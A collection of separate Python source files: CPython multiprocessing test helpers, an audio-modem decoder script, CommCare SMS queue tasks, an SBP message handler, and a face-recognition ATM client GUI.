class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
axr.py | #!/usr/bin/env python3
import sys
import time
import struct
import threading
import subprocess as sp
def eprint(*a, **ka):
ka["file"] = sys.stderr
print(*a, **ka)
class A(object):
def __init__(self, nch, profile):
self.nch = nch
self.profile = profile
self.dec = []
self.emitted = 0
self.procs_alive = self.nch
self.mutex = threading.Lock()
def rd(self, ch, p):
# eprint(ch)
padding = True
# with open(f"{ch}.rd", "wb") as f:
if True:
while True:
buf = p.stdout.read(256)
# eprint(ch, len(buf))
if not buf:
break
if padding:
buf = buf.lstrip(b"\x00")
if buf.startswith(b"\xff"):
padding = False
buf = buf[1:]
else:
continue
# f.write(buf)
with self.mutex:
self.dec[ch] += buf
with self.mutex:
self.procs_alive -= 1
def emit(self):
# check for complete frames to emit
szs = []
with self.mutex:
for n, buf in enumerate(self.dec):
if len(buf) < 4:
return False
magic, sz = struct.unpack(">HH", buf[:4])
if magic != 0xCADE:
if not sz:
return False
m = f"axr: FATAL: desync @ sample {self.emitted} ch{n} magic {magic:04x} sz {sz} hex {sz:04x}"
eprint(m)
try:
eprint("\\x" + buf[:64].hex(" ").replace(" ", "\\x"))
except Exception as ex:
eprint(buf[:64].hex())
eprint(ex)
sys.exit(1)
if len(buf) < sz + 4:
return False
szs.append(sz)
bufs = [x[4 : sz + 4] for x, sz in zip(self.dec, szs)]
self.dec = [x[sz + 4 :] for x, sz in zip(self.dec, szs)]
if not bufs[0]:
return False
for n in range(1, len(bufs)):
if len(bufs[n]) < len(bufs[n - 1]):
eprint(f"axr: WARNING: ch{n} shorter than ch0")
bufs[n] += b"\x00" * 4
# mux and write
dec = [y for x in zip(*bufs) for y in x]
dec = struct.pack(f"{len(dec)}B", *dec)[: sum(szs)]
sys.stdout.buffer.write(dec)
# eprint("emit", len(dec))
self.emitted += len(bufs[0])
return True
def run(self):
# 1ch f32le 44k1
header = b"RIFFH\x0f<\x1eWAVEfmt \x10\x00\x00\x00\x03\x00\x01\x00D\xac\x00\x00\x10\xb1\x02\x00\x04\x00 \x00fact\x04\x00\x00\x00\xc0\x03\x8f\x07PEAK\x10\x00\x00\x00\x01\x00\x00\x00\xd6\xe0\x1d^\x84\x121<O6\xdf\x04data\x00\x0f<\x1e\xe4^\xd25\xd5\xd0?\xb6k\x92a68s5\xb6"
procs = []
# fds = [open(f"{n}.rp", "wb") for n in range(self.nch)]
for ch in range(self.nch):
self.dec.append(b"")
cmd = ["./quiet-decode", self.profile, "/dev/stdin"]
p = sp.Popen(cmd, stdin=sp.PIPE, stdout=sp.PIPE)
threading.Thread(target=self.rd, args=(ch, p), daemon=True).start()
p.stdin.write(header)
procs.append(p)
rem = b""
vhist = []
runtime = 0
while True:
buf = sys.stdin.buffer.read(65535)
if not buf:
break
buf = rem + buf
n = len(buf) % (self.nch * 4)
if n:
rem = buf[-n:]
buf = buf[:-n]
else:
rem = b""
buf = [x[0] for x in struct.iter_unpack("f", buf)]
peak = max(max(buf), abs(min(buf)))
vhist = vhist[-5:] + [peak]
vol = max(vhist)
eprint(f" VOL {int(vol * 100)} %\n\033[A", end="")
for n in range(self.nch):
b = buf[n :: self.nch]
b = struct.pack(f"{len(b)}f", *b) # funfact: lossless
# fds[n].write(b)
procs[n].stdin.write(b)
self.emit()
if peak > 0.1:
runtime += 1
elif vol < 0.1 and runtime > 4:
eprint("axr: INFO: input went silent; exiting")
break
for p in procs:
p.stdin.close()
spins = 0
while True:
if self.emit():
spins = 0
continue
time.sleep(0.02)
spins += 1
if spins > 20:
break
def main():
nch = 2 # stereo
profile = "w"
A(nch, profile).run()
if __name__ == "__main__":
main()
# f() { printf '%s\n' "$1" | tee v1 | ~/dev/diodes/ax/axt.py | tee pcm | ~/dev/diodes/ax/axr.py | tee v2; cat v1; cmp v1 v2 && return 0; hexdump -C v1; hexdump -C v2; return 1; }
# s=''; for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do s=$s$c; f $s || break; done
#
# (for ((a=1; a<255; a++)); do x=$(printf '\\x%02x' $a); printf "$x$x$x$x"; head -c 124 /dev/zero; done) | tee v1 | ~/dev/diodes/ax/axt.py | tee pcm | ~/dev/diodes/ax/axr.py > v2; cmp v1 v2
#
# p=w; (cat dbg/header-44khz.wav; cat ~/Videos/dashcam.webm | ./quiet-encode $p) | tee pcm | ffmpeg -re -v warning -ar 96000 -f f32le -i - -f f32le - -filter_complex "[a:0]showspectrum=s=1024x576:fps=30:legend=1:slide=scroll:color=intensity:fscale=lin:orientation=horizontal,crop=1280:640,format=yuv420p[vo]" -map "[vo]" -f sdl - | ./quiet-decode $p /dev/stdin | pv -Wapterbi 0.5 | cmp ~/Videos/dashcam.webm
#
# ./axt.py <"$f" | tee pcm | ffmpeg -re -v warning -ar 96000 -ac 2 -f f32le -i - -f f32le - -filter_complex "[a:0]showspectrum=s=1024x576:fps=30:legend=1:slide=scroll:color=intensity:fscale=lin:orientation=horizontal,crop=1280:640,format=yuv420p[vo]" -map "[vo]" -f sdl - | ./axr.py | pv -Wapterbi 0.5 | cmp "$f"
#
# ./axt.py <"$f" | ./axr.py | pv -apterbi 0.5 | tee f2 | cmp "$f"
|
tasks.py | import math
import pytz
import logging
from datetime import datetime, timedelta
from celery.task import task
from time import sleep
from redis_cache.cache import RedisCache
from corehq.apps.sms.mixin import SMSLoadBalancingMixin
from corehq.apps.sms.models import SMSLog, OUTGOING, INCOMING
from corehq.apps.sms.api import send_message_via_backend, process_incoming
from django.conf import settings
from corehq.apps.domain.models import Domain
from corehq.apps.smsbillables.models import SmsBillable
from dimagi.utils.timezones import utils as tz_utils
from dimagi.utils.couch.cache import cache_core
from threading import Thread
ERROR_TOO_MANY_UNSUCCESSFUL_ATTEMPTS = "TOO_MANY_UNSUCCESSFUL_ATTEMPTS"
ERROR_MESSAGE_IS_STALE = "MESSAGE_IS_STALE"
ERROR_INVALID_DIRECTION = "INVALID_DIRECTION"
def set_error(msg, system_error_message=None):
msg.error = True
msg.system_error_message = system_error_message
msg.save()
def handle_unsuccessful_processing_attempt(msg):
msg.num_processing_attempts += 1
if msg.num_processing_attempts < settings.SMS_QUEUE_MAX_PROCESSING_ATTEMPTS:
delay_processing(msg, settings.SMS_QUEUE_REPROCESS_INTERVAL)
else:
set_error(msg, ERROR_TOO_MANY_UNSUCCESSFUL_ATTEMPTS)
def handle_successful_processing_attempt(msg):
utcnow = datetime.utcnow()
msg.num_processing_attempts += 1
msg.processed = True
msg.processed_timestamp = utcnow
if msg.direction == OUTGOING:
msg.date = utcnow
msg.save()
def delay_processing(msg, minutes):
msg.datetime_to_process += timedelta(minutes=minutes)
msg.save()
def get_lock(client, key):
return client.lock(key, timeout=settings.SMS_QUEUE_PROCESSING_LOCK_TIMEOUT*60)
def time_within_windows(domain_now, windows):
weekday = domain_now.weekday()
time = domain_now.time()
for window in windows:
if (window.day in [weekday, -1] and
(window.start_time is None or time >= window.start_time) and
(window.end_time is None or time <= window.end_time)):
return True
return False
def handle_domain_specific_delays(msg, domain_object, utcnow):
"""
Checks whether or not we need to hold off on sending an outbound message
due to any restrictions set on the domain, and delays processing of the
message if necessary.
Returns True if a delay was made, False if not.
"""
domain_now = tz_utils.adjust_datetime_to_timezone(utcnow, pytz.utc.zone,
domain_object.default_timezone)
if len(domain_object.restricted_sms_times) > 0:
if not time_within_windows(domain_now, domain_object.restricted_sms_times):
delay_processing(msg, settings.SMS_QUEUE_DOMAIN_RESTRICTED_RETRY_INTERVAL)
return True
if msg.chat_user_id is None and len(domain_object.sms_conversation_times) > 0:
if time_within_windows(domain_now, domain_object.sms_conversation_times):
sms_conversation_length = domain_object.sms_conversation_length
conversation_start_timestamp = utcnow - timedelta(minutes=sms_conversation_length)
if SMSLog.inbound_entry_exists(msg.couch_recipient_doc_type,
msg.couch_recipient,
conversation_start_timestamp,
utcnow):
delay_processing(msg, 1)
return True
return False
def message_is_stale(msg, utcnow):
oldest_allowable_datetime = \
utcnow - timedelta(hours=settings.SMS_QUEUE_STALE_MESSAGE_DURATION)
if isinstance(msg.date, datetime):
return msg.date < oldest_allowable_datetime
else:
return True
def _wait_and_release_lock(lock, timeout, start_timestamp):
while (datetime.utcnow() - start_timestamp) < timedelta(seconds=timeout):
sleep(0.1)
try:
lock.release()
except:
# The lock could have timed out in the meantime
pass
def wait_and_release_lock(lock, timeout):
timestamp = datetime.utcnow()
t = Thread(target=_wait_and_release_lock, args=(lock, timeout, timestamp))
t.start()
def handle_outgoing(msg):
"""
Should return a requeue flag, so if it returns True, the message will be
requeued and processed again immediately, and if it returns False, it will
not be queued again.
"""
def onerror():
logging.exception("Exception while processing SMS %s" % msg._id)
backend = msg.outbound_backend
sms_interval = backend.get_sms_interval()
use_rate_limit = sms_interval is not None
use_load_balancing = (isinstance(backend, SMSLoadBalancingMixin) and
len(backend.phone_numbers) > 1)
if use_rate_limit or use_load_balancing:
client = cache_core.get_redis_client()
lbi = None
orig_phone_number = None
if use_load_balancing:
lbi = backend.get_next_phone_number(client)
orig_phone_number = lbi.phone_number
elif (isinstance(backend, SMSLoadBalancingMixin) and
len(backend.phone_numbers) == 1):
# If there's only one phone number, we don't need to go through the
# load balancing algorithm. But we should always pass an
# orig_phone_number if it's an instance of SMSLoadBalancingMixin.
orig_phone_number = backend.phone_numbers[0]
if use_rate_limit:
if use_load_balancing:
lock_key = "sms-backend-%s-rate-limit-phone-%s" % (backend._id,
lbi.phone_number)
else:
lock_key = "sms-backend-%s-rate-limit" % backend._id
lock = client.lock(lock_key, timeout=30)
if not use_rate_limit or (use_rate_limit and lock.acquire(blocking=False)):
if use_load_balancing:
lbi.finish(save_stats=True)
result = send_message_via_backend(msg, backend=backend,
orig_phone_number=orig_phone_number, onerror=onerror)
if use_rate_limit:
wait_and_release_lock(lock, sms_interval)
if result:
handle_successful_processing_attempt(msg)
else:
handle_unsuccessful_processing_attempt(msg)
return False
else:
# We're using rate limiting, but couldn't acquire the lock, so
# another thread is sending sms with this backend. Rather than wait,
# we'll just put this message at the back of the queue.
if use_load_balancing:
lbi.finish(save_stats=False)
return True
def handle_incoming(msg):
try:
process_incoming(msg)
handle_successful_processing_attempt(msg)
except:
logging.exception("Exception while processing SMS %s" % msg._id)
handle_unsuccessful_processing_attempt(msg)
@task(queue="sms_queue")
def process_sms(message_id):
"""
message_id - _id of an SMSLog entry
"""
# Note that Redis error/exception notifications go out from the
# run_sms_queue command, so no need to send them out here
# otherwise we'd get too many emails.
rcache = cache_core.get_redis_default_cache()
if not isinstance(rcache, RedisCache):
return
try:
client = rcache.raw_client
except NotImplementedError:
return
utcnow = datetime.utcnow()
# Prevent more than one task from processing this SMS, just in case
# the message got enqueued twice.
message_lock = get_lock(client, "sms-queue-processing-%s" % message_id)
if message_lock.acquire(blocking=False):
msg = SMSLog.get(message_id)
if message_is_stale(msg, utcnow):
set_error(msg, ERROR_MESSAGE_IS_STALE)
message_lock.release()
return
if msg.direction == OUTGOING:
domain_object = Domain.get_by_name(msg.domain, strict=True)
if handle_domain_specific_delays(msg, domain_object, utcnow):
message_lock.release()
return
requeue = False
# Process inbound SMS from a single contact one at a time
recipient_block = msg.direction == INCOMING
if (isinstance(msg.processed, bool)
and not msg.processed
and not msg.error
and msg.datetime_to_process < utcnow):
if recipient_block:
recipient_lock = get_lock(client,
"sms-queue-recipient-phone-%s" % msg.phone_number)
recipient_lock.acquire(blocking=True)
if msg.direction == OUTGOING:
requeue = handle_outgoing(msg)
elif msg.direction == INCOMING:
handle_incoming(msg)
else:
set_error(msg, ERROR_INVALID_DIRECTION)
if recipient_block:
recipient_lock.release()
message_lock.release()
if requeue:
process_sms.delay(message_id)
@task
def store_billable(msg):
if msg._id and not SmsBillable.objects.filter(log_id=msg._id).exists():
try:
msg.text.encode('iso-8859-1')
msg_length = 160
except UnicodeEncodeError:
# This string contains unicode characters, so the allowed
# per-sms message length is shortened
msg_length = 70
for _ in range(int(math.ceil(float(len(msg.text)) / msg_length))):
SmsBillable.create(msg)
|
handler.py | # Copyright (C) 2015-2021 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`sbp.client.handler` module contains classes related to
SBP message handling.
"""
import warnings
import collections
import threading
import weakref
import six
from six.moves.queue import Queue
try:
from typing import Optional # noqa
except ImportError:
pass
class Handler(object):
"""
Handler
The :class:`Handler` class provides an interface for connecting handlers
to a driver providing SBP messages. Also provides queued and filtered
iterators for synchronous, blocking use in other threads.
Parameters
----------
source : Iterable of tuple(SBP message, {'time':'ISO 8601 str'})
Stream of SBP messages
autostart : Boolean
If false, start() shall be skipped when entering context scope and it
should be explicitly called by the parent. This will prevent losing
messages in case where receive thread would otherwise be started before
consumers are ready.
"""
def __init__(self, source, autostart=True):
self._autostart = autostart
self._source = source
self._callbacks = collections.defaultdict(set)
self._receive_thread = threading.Thread(
target=self._recv_thread, name="Handler")
self._receive_thread.daemon = True
self._sinks = [] # This is a list of weakrefs to upstream iterators
self._dead = False
self._exception = None
self._write_lock = threading.Lock()
def _recv_thread(self):
"""
Internal thread to iterate over source messages and dispatch callbacks.
"""
def gen_messages():
for msg, metadata in self._source:
if msg.msg_type:
yield (msg, metadata)
messages = gen_messages()
while True:
msg_and_metadata = None
try:
msg_and_metadata = next(messages, None)
except Exception as exc:
self._exception = exc
break
if msg_and_metadata is None:
break
msg, metadata = msg_and_metadata
self._call(msg, **metadata)
# Break any upstream iterators
for sink in self._sinks:
i = sink()
if i is not None:
i.breakiter(self._exception)
self._dead = True
def __enter__(self):
if self._autostart:
self.start()
return self
def __exit__(self, *args):
self.stop()
# This exception is raised when a message is dispatched to a garbage
# collected upstream iterator.
class _DeadCallbackException(Exception):
pass
def filter(self, msg_type=None, maxsize=0):
"""
Get a filtered iterator of messages for synchronous, blocking use in
another thread.
"""
if self._dead:
return iter(())
iterator = Handler._SBPQueueIterator(maxsize)
# We use a weakref so that the iterator may be garbage collected if it's
# consumer no longer has a reference.
ref = weakref.ref(iterator)
self._sinks.append(ref)
def feediter(msg, **metadata):
i = ref()
if i is not None:
i(msg, **metadata)
else:
raise Handler._DeadCallbackException
self.add_callback(feediter, msg_type)
return iterator
def __iter__(self):
"""
Get a queued iterator that will provide the same unfiltered messages
read from the source iterator.
"""
return self.filter()
def _to_iter(self, maybe_iter):
try:
return iter(maybe_iter)
except TypeError:
return None
def add_callback(self, callback, msg_type=None):
"""
Add per message type or global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
"""
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
self._callbacks[msg_type_].add(callback)
else:
self._callbacks[msg_type].add(callback)
def remove_callback(self, callback, msg_type=None):
"""
Remove per message type of global callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to remove callback from. Default `None` means global callback.
Iterable type removes the callback from all the message types.
"""
if msg_type is None:
msg_type = self._callbacks.keys()
cb_keys = self._to_iter(msg_type)
if cb_keys is not None:
for msg_type_ in cb_keys:
try:
self._callbacks[msg_type_].remove(callback)
except KeyError:
pass
else:
self._callbacks[msg_type].remove(callback)
def _gc_dead_sinks(self):
"""
Remove any dead weakrefs.
"""
deadsinks = []
for i in self._sinks:
if i() is None:
deadsinks.append(i)
for i in deadsinks:
self._sinks.remove(i)
def _get_callbacks(self, msg_type):
"""
Return all callbacks (global and per message type) for a message type.
Parameters
----------
msg_type : int
Message type to return callbacks for.
"""
return self._callbacks[None] | self._callbacks[msg_type]
def _call(self, msg, **metadata):
"""
Process message with all callbacks (global and per message type).
"""
if msg.msg_type:
for callback in self._get_callbacks(msg.msg_type):
try:
callback(msg, **metadata)
except Handler._DeadCallbackException:
# The callback was an upstream iterator that has been garbage
# collected. Remove it from our internal structures.
self.remove_callback(callback)
self._gc_dead_sinks()
except SystemExit:
raise
except:
import traceback
traceback.print_exc()
def start(self):
"""
Start processing SBP messages with handlers.
"""
self._receive_thread.start()
def stop(self):
"""
Stop processing SBP messages.
"""
try:
self._source.breakiter()
self._receive_thread.join(0.1)
except Exception as exc:
warnings.warn("Handler stop error: %s" % (exc,))
def join(self, timeout=None):
self._receive_thread.join(timeout)
def is_alive(self):
"""
Return whether the processes thread is alive.
"""
return self._receive_thread.is_alive()
def wait(self, msg_type, timeout=1.0):
"""
Wait for a SBP message.
Parameters
----------
msg_type : int
SBP message type.
timeout : float
Waiting period
"""
event = threading.Event()
payload = {'data': None}
def cb(sbp_msg, **metadata):
payload['data'] = sbp_msg
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
return payload['data']
def wait_callback(self, callback, msg_type=None, timeout=1.0):
"""
Wait for a SBP message with a callback.
Parameters
----------
callback : fn
Callback function
msg_type : int | iterable
Message type to register callback against. Default `None` means global callback.
Iterable type adds the callback to all the message types.
timeout : float
Waiting period
"""
event = threading.Event()
def cb(msg, **metadata):
callback(msg, **metadata)
event.set()
self.add_callback(cb, msg_type)
event.wait(timeout)
self.remove_callback(cb, msg_type)
def __call__(self, *msgs, **metadata):
"""
Pass messages to the `source` to be consumed. Typically this means
the messages will be framed and transmitted via whatever transport
layer is currently active.
Parameters
----------
msgs : SBP messages
SBP messages to send.
metadata : dict
Metadata for this batch of messages, passed to the `source`.
"""
with self._write_lock:
self._source(*msgs, **metadata)
class _SBPQueueIterator(six.Iterator):
"""
Class for upstream iterators. Implements callable interface for adding
messages into the queue, and iterable interface for getting them out.
"""
def __init__(self, maxsize):
self._queue = Queue(maxsize)
self._broken = False
self._exception = None # type: Optional[Exception]
def __iter__(self):
return self
def __call__(self, msg, **metadata):
self._queue.put((msg, metadata), False)
def breakiter(self, exc=None):
self._broken = True
self._exception = exc
self._queue.put(None, True, 1.0)
def __next__(self):
if self._broken and self._queue.empty():
raise StopIteration
m = self._queue.get(True)
if self._broken and m is None:
if self._exception is not None:
raise self._exception
raise StopIteration
return m
|
atminterface.py | #!/usr/bin/env python
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GObject, Gdk, GLib
from thread import *
import time
import socket
import subprocess
import threading
from imutils import face_utils
import numpy as np
import argparse
import imutils
import dlib
import cv2
from sympy import Point, Line, mpmath
from mpmath import *
from operator import itemgetter
import base64
from sendfile import sendfile
#Informacije o uredaju
INTERFACEID = "28734682"
#Informacije o serveru
#HOST = '127.0.0.1'
HOST = '192.168.1.10'
PORT = 8888
ADDR = (HOST,PORT)
#Stvaranje socketa
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Klasa za rad sa GUI-jem -> GTK
class GUI:
def calculateFaceTilt(self, leftEye, rightEye):
zeroLine = Line(Point(1, 0), Point(0, 0))
eyeMiddlePoint = Point((leftEye + rightEye) / 2)
eyeLine = Line(leftEye, rightEye)
angle = mpmath.degrees(eyeLine.angle_between(zeroLine))
if (leftEye.y > rightEye.y):
return int(angle) - 180
else:
return 180 - int(angle)
def rotateImage(self, imageObj, correctionAngle, nosePoint):
rotationMatrix = cv2.getRotationMatrix2D(nosePoint, correctionAngle, 1.0)
return cv2.warpAffine(imageObj, rotationMatrix, (imageObj.shape[1], imageObj.shape[0]), flags=cv2.INTER_LINEAR)
def waitForResponse(self):
while True:
data = client.recv(1024)
if not data: break
components = data.split(":")
if components[0] == "ok":
break
else:
return components
def sendFaceImages(self):
self.statusLabel.set_text("Obrada uzoraka")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("ldm.dat")
for i in range(0, 7):
gray = cv2.imread("Camera/Resources/" + str(i) + '.png', cv2.CV_8UC1)
#gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
rects = detector(gray, 1)
# loop over the face detections
for (j, rect) in enumerate(rects):
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
angle = self.calculateFaceTilt(Point(shape[39]), Point(shape[42]))
gray = self.rotateImage(gray, angle, tuple(shape[33]))
#gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
rects = detector(gray, 1)
# loop over the face detections
for (k, rect) in enumerate(rects):
shape = predictor(gray, rect)
shape = face_utils.shape_to_np(shape)
eye = Point(shape[37])
eyebrow = Point(shape[19])
left = Point(min(shape, key=itemgetter(0)))
top = Point(min(shape, key=itemgetter(1)))
right = Point(max(shape, key=itemgetter(0)))
bottom = Point(max(shape, key=itemgetter(1)))
gray = gray[int(top.y - eye.distance(eyebrow) / 2):int(top.y + top.distance(bottom)),
int(left.x):int(left.x + left.distance(right))]
#ujednacavanje histograma
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
gray = clahe.apply(gray)
#gray = cv2.bilateralFilter(gray, 9, 75, 75)
ratio = 300.0 / gray.shape[1]
dimensions = (300, int(gray.shape[0] * ratio))
gray = cv2.resize(gray, dimensions, interpolation=cv2.INTER_AREA)
cv2.imwrite("Camera/Resources/" + str(i) + '.png', gray)
for i in range(0, 7):
self.statusLabel.set_text("Slanje uzoraka")
client.send("ftp:" + str(i))
self.waitForResponse()
imageFile = open("Camera/Resources/" + str(i) + '.png', "rb")
offset = 0
while True:
sent = sendfile(client.fileno(), imageFile.fileno(), offset, 4096)
if sent == 0:
client.send("EOF")
break # EOF
offset += sent
self.statusLabel.set_text("Potvrdite PIN")
self.btnConfirm.set_sensitive(True)
self.waitForResponse()
def waitForTokenApproval(self):
response = self.waitForResponse()[1]
if response == "ok":
self.statusLabel.set_text("Token odobren")
else:
self.statusLabel.set_text("Token odbijen")
def sendPIN(self):
client.send("pin:" + str(self.inputPin.get_text()))
key, pinmessage, authmessage, token = self.waitForResponse()
if key == "ath":
if pinmessage == "pin;ok":
if authmessage == "fce;ok":
self.statusLabel.set_text("Uspjesno!")
elif authmessage == "fce;fls":
self.statusLabel.set_text("Token: " + token.split(";")[1])
thread = threading.Thread(target=self.waitForTokenApproval)
thread.daemon = True
thread.start()
else:
self.statusLabel.set_text("Neuspjesno!")
def sendAccountNumber(self):
client.send("acc:" + str(self.getActiveComboItem()))
self.waitForResponse()
def sendInterfaceId(self):
client.send("ifc:" + INTERFACEID)
self.waitForResponse()
def sendInformation(self, zero):
self.sendInterfaceId()
self.sendAccountNumber()
self.sendFaceImages()
#Uzimanje uzoraka lica i pozivanje metode za slanje
def getFaceImages(self, zero):
self.statusLabel.set_text("Uzimanje uzoraka")
cameraProc = subprocess.Popen(["./FaceTracker"], stdout=subprocess.PIPE, cwd="Camera", shell=True, bufsize=1)
with cameraProc.stdout:
for line in iter(cameraProc.stdout.readline, b''):
print line
if line == 'faceFound\n':
self.sendInformation(0)
elif line == 'faceNotFound\n':
self.statusLabel.set_text("Lice nije\ndetektirano!")
elif line == 'usbNotFound\n':
self.statusLabel.set_text("Problem s\nkamerom")
cameraProc.wait()
def getActiveComboItem(self):
index = self.cbxAccountNum.get_active()
model = self.cbxAccountNum.get_model()
if index == 0:
return None
return model[index][0]
